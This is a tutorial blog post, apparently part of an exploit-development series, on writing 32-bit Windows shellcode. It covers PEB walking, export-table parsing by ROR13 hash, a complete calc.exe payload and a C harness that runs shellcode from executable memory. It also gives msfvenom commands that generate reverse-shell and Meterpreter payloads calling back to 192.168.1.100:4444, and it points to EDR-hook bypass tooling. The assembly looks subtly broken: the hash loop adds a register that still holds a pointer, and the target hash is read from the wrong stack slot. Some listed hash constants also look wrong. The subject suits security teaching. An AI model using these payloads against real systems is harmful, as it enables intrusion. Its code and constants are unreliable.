Writing Shellcode for Windows
In the Linux shellcode article, we wrote shellcode that called the kernel directly — load registers, trigger int 0x80, done. The kernel’s syscall interface is stable, documented, and numbered. Syscall 11 is always execve. Syscall 1 is always exit.
Windows doesn’t work that way.
Windows syscall numbers change between versions — even between service packs. The syscall for NtCreateFile might be 0x55 on Windows 7 and 0x56 on Windows 10. Microsoft considers the syscall interface private and undocumented. You’re supposed to go through the Win32 API — kernel32.dll, ntdll.dll, user32.dll.
This means Windows shellcode must:
- Find where kernel32.dll is loaded in memory — at runtime, without hardcoding addresses
- Parse kernel32.dll’s export table — walk the PE structure to find function addresses
- Resolve the API functions it needs —
WinExec,LoadLibraryA,GetProcAddress, etc. - Call those functions — finally do something useful
This is significantly more complex than Linux shellcode. But it’s also more elegant — once you understand PEB walking and export parsing, you can call any Windows API function from position-independent shellcode.
The Architecture — Why PEB Walking?
When a Windows process starts, the OS loads several DLLs into its address space. The most important for shellcode:
| DLL | Why We Need It |
|---|---|
| kernel32.dll | Contains WinExec, LoadLibraryA, GetProcAddress, ExitProcess |
| ntdll.dll | Low-level NT functions, always loaded first |
| ws2_32.dll | WinSock — needed for reverse shells (not loaded by default) |
The problem: ASLR randomizes where these DLLs load. We can’t hardcode WinExec = 0x7C8623AD — that address changes every boot.
The solution: every Windows process has a Process Environment Block (PEB) — a data structure that contains, among other things, a linked list of all loaded modules (DLLs) and their base addresses. The PEB is always accessible via a fixed CPU segment register.
TEB (Thread Environment Block)
↓ offset 0x30
PEB (Process Environment Block)
↓ offset 0x0C
PEB_LDR_DATA
↓ offset 0x14
InMemoryOrderModuleList (doubly-linked list)
→ ntdll.dll
→ kernel32.dll (or kernelbase.dll)
→ ...other loaded DLLs
From any thread, at any time, regardless of ASLR:
mov eax, fs:[0x30] ; EAX = PEB address (always works, 32-bit)
; On 64-bit: mov rax, gs:[0x60]
That’s the entry point. From the PEB, we walk the module list to find kernel32.dll’s base address. From kernel32.dll’s base, we parse the PE export table to find function addresses.
Step 1: Finding kernel32.dll via PEB
The PEB Structure (Relevant Fields)
PEB (at fs:[0x30]):
+0x00 InheritedAddressSpace
+0x08 ImageBaseAddress
+0x0C Ldr → PEB_LDR_DATA
...
PEB_LDR_DATA:
+0x0C InLoadOrderModuleList
+0x14 InMemoryOrderModuleList ← We use this one
+0x1C InInitializationOrderModuleList
Each list entry (LDR_DATA_TABLE_ENTRY via InMemoryOrderModuleList):
+0x00 InMemoryOrderLinks.Flink (next entry)
+0x08 InMemoryOrderLinks.Blink (previous entry)
+0x10 DllBase ← The DLL's base address in memory
+0x18 EntryPoint
+0x20 SizeOfImage
+0x28 FullDllName (UNICODE_STRING)
+0x30 BaseDllName (UNICODE_STRING)
The InMemoryOrderModuleList is a doubly-linked list of all loaded modules. The order is:
- The executable itself (e.g.,
vulnerable.exe) ntdll.dllkernel32.dll(orkernelbase.dllon Win7+)
So to find kernel32.dll, we follow the list: skip the first entry (the exe), skip the second (ntdll), and the third is kernel32.
Assembly: Walking the PEB
; Find kernel32.dll base address
; 32-bit Windows
xor ecx, ecx
mov eax, fs:[ecx+0x30] ; EAX = PEB
mov eax, [eax+0x0C] ; EAX = PEB->Ldr (PEB_LDR_DATA)
mov esi, [eax+0x14] ; ESI = InMemoryOrderModuleList.Flink (first entry)
lodsd ; EAX = second entry (ntdll.dll)
xchg eax, esi ; ESI = second entry
lodsd ; EAX = third entry (kernel32.dll)
mov ebx, [eax+0x10] ; EBX = kernel32.dll base address!
Let’s trace this:
fs:[0x30]gives us the PEB- PEB+0x0C gives us PEB_LDR_DATA
- PEB_LDR_DATA+0x14 gives us the first entry in InMemoryOrderModuleList (the .exe)
- First
lodsd(loads dword at ESI into EAX, advances ESI) moves to the second entry (ntdll.dll) - Second
lodsdmoves to the third entry (kernel32.dll) - Entry+0x10 gives us the DllBase — kernel32.dll’s base address
EBX now contains kernel32.dll’s base address. This works regardless of ASLR.
Note on Modern Windows
On Windows 7+, kernelbase.dll sometimes appears before kernel32.dll in the list. kernelbase.dll exports many of the same functions. For maximum compatibility, some shellcode walks the list and checks the module name — but for simplicity, the third-entry assumption works for most cases.
Step 2: Parsing the PE Export Table
Now that we have kernel32.dll’s base address, we need to find specific functions within it. DLLs are PE (Portable Executable) files, and their exported functions are listed in the Export Directory.
PE Structure (from the base address)
Base Address (EBX):
+0x3C e_lfanew → offset to PE signature
PE Signature:
+0x00 "PE\0\0"
+0x78 Export Directory RVA (Relative Virtual Address)
Export Directory:
+0x18 NumberOfNames
+0x1C AddressOfFunctions (RVA array of function addresses)
+0x20 AddressOfNames (RVA array of function name pointers)
+0x24 AddressOfNameOrdinals (RVA array of ordinal values)
The export resolution process:
- Walk the AddressOfNames array — compare each name to the function we’re looking for
- When we find a match at index
i— read the ordinal fromAddressOfNameOrdinals[i] - Use the ordinal to index into AddressOfFunctions — that gives us the function’s RVA
- Add the DLL base address to the RVA — that’s the actual function address
Assembly: Finding a Function by Name
This is the core routine of every Windows shellcode. We’ll write a function that takes a DLL base address and a function name hash, and returns the function address.
Why Hashing?
Comparing strings byte-by-byte in shellcode is bulky. Instead, we compute a hash of each export name and compare it to a pre-computed hash of the function we want. This saves space significantly.
The most common hash algorithm in shellcode is a simple rotate-and-add:
; Hash function: ROR13 + ADD
; Input: ESI = pointer to ASCII string
; Output: EDX = hash
compute_hash:
xor edx, edx
.hash_loop:
lodsb ; AL = next byte, ESI++
test al, al
jz .hash_done
ror edx, 13 ; Rotate right by 13
add edx, eax ; Add character value
jmp .hash_loop
.hash_done:
ret
Pre-compute the hash for WinExec:
def ror13_hash(name):
h = 0
for c in name:
h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
h = (h + ord(c)) & 0xFFFFFFFF
return h
print(hex(ror13_hash("WinExec"))) # 0x0E8AFE98
print(hex(ror13_hash("ExitProcess"))) # 0x7ED8E273
print(hex(ror13_hash("LoadLibraryA"))) # 0x0726774C
print(hex(ror13_hash("GetProcAddress"))) # 0x7C0DFCAA
Assembly: Complete Export Resolution
; find_function: Resolve a function from a DLL by hash
; Input: EBX = DLL base address
; EDX = hash of function name to find
; Output: EAX = function address
find_function:
pushad
mov eax, [ebx+0x3C] ; e_lfanew (offset to PE header)
mov edi, [ebx+eax+0x78] ; Export Directory RVA
add edi, ebx ; EDI = Export Directory absolute address
mov ecx, [edi+0x18] ; ECX = NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; EAX = AddressOfNames absolute
.find_loop:
jecxz .find_fail ; If no more names, fail
dec ecx
mov esi, [eax+ecx*4] ; ESI = RVA of name[ecx]
add esi, ebx ; ESI = absolute address of name string
; Compute hash of this export name
xor edx, edx
.hash_loop:
lodsb
test al, al
jz .hash_done
ror edx, 13
add edx, eax
jmp .hash_loop
.hash_done:
cmp edx, [esp+0x24] ; Compare with our target hash (saved on stack)
jnz .find_loop ; No match, try next name
; Match found! Get the function address
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
add eax, ebx
mov cx, [eax+ecx*2] ; CX = ordinal for this name
mov eax, [edi+0x1C] ; AddressOfFunctions RVA
add eax, ebx
mov eax, [eax+ecx*4] ; EAX = function RVA
add eax, ebx ; EAX = function absolute address!
mov [esp+0x1C], eax ; Store result (overwrite saved EAX in pushad frame)
popad
ret
.find_fail:
popad
xor eax, eax
ret
Step 3: Putting It All Together — WinExec Shellcode
Now we combine PEB walking + export resolution + the actual payload.
Complete WinExec(“calc.exe”) Shellcode
[BITS 32]
cld ; Clear direction flag
; ===== FIND KERNEL32.DLL =====
xor ecx, ecx
mov eax, fs:[ecx+0x30] ; PEB
mov eax, [eax+0x0C] ; PEB->Ldr
mov esi, [eax+0x14] ; InMemoryOrderModuleList
lodsd ; Skip exe entry → ntdll
xchg eax, esi
lodsd ; Skip ntdll → kernel32
mov ebx, [eax+0x10] ; EBX = kernel32.dll base
; ===== FIND WinExec =====
mov edx, 0x0E8AFE98 ; Hash of "WinExec"
call find_function ; EAX = WinExec address
mov edi, eax ; Save WinExec address in EDI
; ===== FIND ExitProcess =====
mov edx, 0x7ED8E273 ; Hash of "ExitProcess"
call find_function ; EAX = ExitProcess address
mov esi, eax ; Save ExitProcess address in ESI
; ===== CALL WinExec("calc.exe", 0) =====
xor ecx, ecx
push ecx ; null terminator
push 0x6578652E ; ".exe"
push 0x636C6163 ; "calc"
mov eax, esp ; EAX = pointer to "calc.exe\0" on stack
push ecx ; uCmdShow = 0 (SW_HIDE)
push eax ; lpCmdLine = "calc.exe"
call edi ; Call WinExec("calc.exe", 0)
; ===== CALL ExitProcess(0) =====
xor ecx, ecx
push ecx ; Exit code = 0
call esi ; Call ExitProcess(0)
; ===== FIND_FUNCTION SUBROUTINE =====
find_function:
pushad
mov eax, [ebx+0x3C]
mov edi, [ebx+eax+0x78]
add edi, ebx
mov ecx, [edi+0x18]
mov eax, [edi+0x20]
add eax, ebx
.find_loop:
jecxz .find_fail
dec ecx
mov esi, [eax+ecx*4]
add esi, ebx
xor edx, edx
.hash_loop:
lodsb
test al, al
jz .hash_compare
ror edx, 13
add edx, eax
jmp .hash_loop
.hash_compare:
cmp edx, [esp+0x24]
jnz .find_loop
mov eax, [edi+0x24]
add eax, ebx
mov cx, [eax+ecx*2]
mov eax, [edi+0x1C]
add eax, ebx
mov eax, [eax+ecx*4]
add eax, ebx
mov [esp+0x1C], eax
popad
ret
.find_fail:
popad
xor eax, eax
ret
Compiling and Testing
# Assemble
$ nasm -f bin shellcode.asm -o shellcode.bin
# Check for null bytes (must be zero!)
$ xxd shellcode.bin | grep " 00 "
# Extract as hex string
$ xxd -p shellcode.bin | tr -d '\n'
# Check size
$ wc -c shellcode.bin
The C Test Harness
#include <stdio.h>
#include <windows.h>
unsigned char shellcode[] =
"\xfc\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14"
"\xad\x96\xad\x8b\x58\x10..." // (full shellcode bytes here)
;
int main() {
printf("Shellcode length: %d\n", sizeof(shellcode) - 1);
// Allocate executable memory
void *exec = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof(shellcode));
// Execute
((void(*)())exec)();
return 0;
}
Compile with:
> gcc -o test test.c -m32
> test.exe
Calculator should pop up.
Avoiding Null Bytes
Just like Linux shellcode, null bytes (\x00) terminate C strings and break many exploit delivery mechanisms. Common null byte sources and fixes:
| Problem | Contains Null | Fix |
|---|---|---|
mov eax, 0 |
\xB8\x00\x00\x00\x00 |
xor eax, eax |
push 0 |
\x6A\x00 |
xor ecx, ecx; push ecx |
mov eax, 0x0E8AFE98 |
May contain \x00 |
Check — this one doesn’t |
| String “calc.exe\0” | Null terminator | Push null via xor ecx,ecx; push ecx before pushing the string |
push 0x00636C61 |
Leading zero byte | Use push 0x61636C63 and rearrange, or encode differently |
The string pushing technique:
; Push "calc.exe\0" onto the stack (no null bytes in the code)
xor ecx, ecx
push ecx ; Push null terminator (\0)
; "calc.exe" = 63 61 6C 63 2E 65 78 65
; In little-endian dwords:
push 0x6578652E ; ".exe" (backwards: 2E 65 78 65)
push 0x636C6163 ; "calc" (backwards: 63 61 6C 63)
mov eax, esp ; EAX points to "calc.exe\0"
Each push puts 4 bytes on the stack in little-endian order. The null terminator is pushed first (via push ecx where ECX=0).
Reverse Shell Shellcode
A calculator pop is a proof of concept. For real exploitation, we need a reverse shell. This requires loading ws2_32.dll (WinSock), which isn’t loaded by default.
The Strategy
- Find
kernel32.dll→ resolveLoadLibraryAandGetProcAddress - Call
LoadLibraryA("ws2_32.dll")→ load WinSock - Use
GetProcAddressto find:WSAStartup,WSASocketA,connect - Initialize WinSock, create a socket, connect to the attacker
- Redirect stdin/stdout/stderr to the socket
- Spawn
cmd.exe
Shellcode flow:
PEB → kernel32.dll base
→ LoadLibraryA("ws2_32.dll") → ws2_32.dll base
→ WSAStartup(0x0202, &wsadata)
→ WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
→ connect(sock, {AF_INET, port, IP}, 16)
→ CreateProcessA("cmd.exe", ..., stdin=sock, stdout=sock, stderr=sock)
This is substantially more complex than Linux reverse shell shellcode (which is ~70 bytes using raw syscalls). Windows reverse shell shellcode is typically 300-500 bytes due to the PEB walking, export resolution, and WinSock setup overhead.
In practice, most exploit developers use msfvenom to generate Windows shellcode:
# Windows reverse shell shellcode
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
-f c -a x86 --platform windows -b "\x00"
# Windows Meterpreter (staged)
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
-f c -a x86 --platform windows -b "\x00"
# Exec calc.exe (proof of concept)
$ msfvenom -p windows/exec CMD=calc.exe \
-f c -a x86 --platform windows -b "\x00"
But understanding how it works under the hood — PEB walking, export parsing, API resolution — is essential for writing custom payloads, debugging failed exploits, and analyzing malware.
Linux vs Windows Shellcode — Complete Comparison
| Aspect | Linux | Windows |
|---|---|---|
| Syscall interface | Stable, numbered (int 0x80 / syscall) |
Unstable, undocumented (changes per version) |
| How to call OS | Load registers, trigger interrupt | Must find and call DLL functions dynamically |
| Finding functions | Not needed — syscall numbers are fixed | Walk PEB → parse PE exports → resolve by hash |
| Position independence | jmp-call-pop for data references |
PEB walking is inherently position-independent |
| Typical size (shell) | 25-50 bytes | 200-500 bytes |
| Null byte avoidance | Same techniques | Same techniques |
| Reverse shell size | 70-100 bytes | 300-500 bytes |
| Complexity | Simple (register + interrupt) | Complex (PEB + PE parsing + API calls) |
| Key skill | Understanding syscall ABI | Understanding PE format and Windows internals |
| Encoding | shikata_ga_nai, XOR |
Same encoders work |
The size difference is dramatic. A Linux execve("/bin/sh") shellcode is 21 bytes. The equivalent Windows shellcode (finding kernel32, resolving WinExec, calling it) is ~150+ bytes minimum. This is entirely due to the extra work of dynamic API resolution.
Debugging Shellcode with x32dbg
When shellcode doesn’t work (and it often doesn’t on the first try), x32dbg is your best friend.
Method 1: Test Harness
Compile the C test harness (above), load it in x32dbg, and step through:
1. Set breakpoint at the VirtualAlloc return
2. After VirtualAlloc, note the allocated memory address
3. Set breakpoint at the call to the shellcode (the function pointer call)
4. Step into — you're now inside your shellcode
5. Step through instruction by instruction
6. Watch registers and the stack at each step
Method 2: Inject into a Process
1. Load target process in x32dbg
2. Allocate memory: right-click memory map → Allocate Memory
3. Write shellcode bytes to the allocated region
4. Set EIP to the shellcode address
5. Step through
Key Things to Watch
- EBX after PEB walk — Does it contain a valid kernel32.dll base? (Should look like
0x7xxx0000) - The export table parse — Is EDI pointing to a valid Export Directory? Check with
Memory Mapto verify it’s within kernel32.dll’s range. - The hash comparison — Set a conditional breakpoint on the
cmpinstruction to catch when your target hash matches. - The function address — After
find_functionreturns, is EAX a valid code address within kernel32.dll? - The stack before API calls — Are arguments in the right order? Is the stack aligned?
Further Reading and Tools
| Resource | Purpose |
|---|---|
| msfvenom | Generate Windows shellcode for any payload |
| Donut | Convert .NET assemblies and PE files into position-independent shellcode |
| SysWhispers | Generate direct syscall stubs (bypass API hooking by EDR) |
| Shellcode compiler (scc) | Compile C code into position-independent shellcode |
| PE-bear | GUI PE parser — helps understand DLL structures |
| Windows Internals (book) | Deep dive into PEB, TEB, and loader internals |
Final Thoughts
Windows shellcode is harder than Linux shellcode. There’s no way around it. The PEB walking, PE export parsing, and dynamic API resolution add complexity that simply doesn’t exist on Linux. A Linux shellcode writer thinks about registers and syscall numbers. A Windows shellcode writer thinks about PE structures, linked lists, and hash-based function resolution.
But this complexity is also what makes it interesting. The PEB walk is an elegant solution to a real problem — finding code at runtime without any hardcoded addresses. It’s the same technique that malware uses to resolve API functions dynamically (making static analysis harder). Understanding it gives you insight into both offensive and defensive security on Windows.
If you’ve followed the Linux and Windows exploit development series to this point — from basic GDB reversing through stack overflows, ret2libc, and now shellcode internals — you have a solid foundation in low-level exploitation on both platforms.
Happy reversing!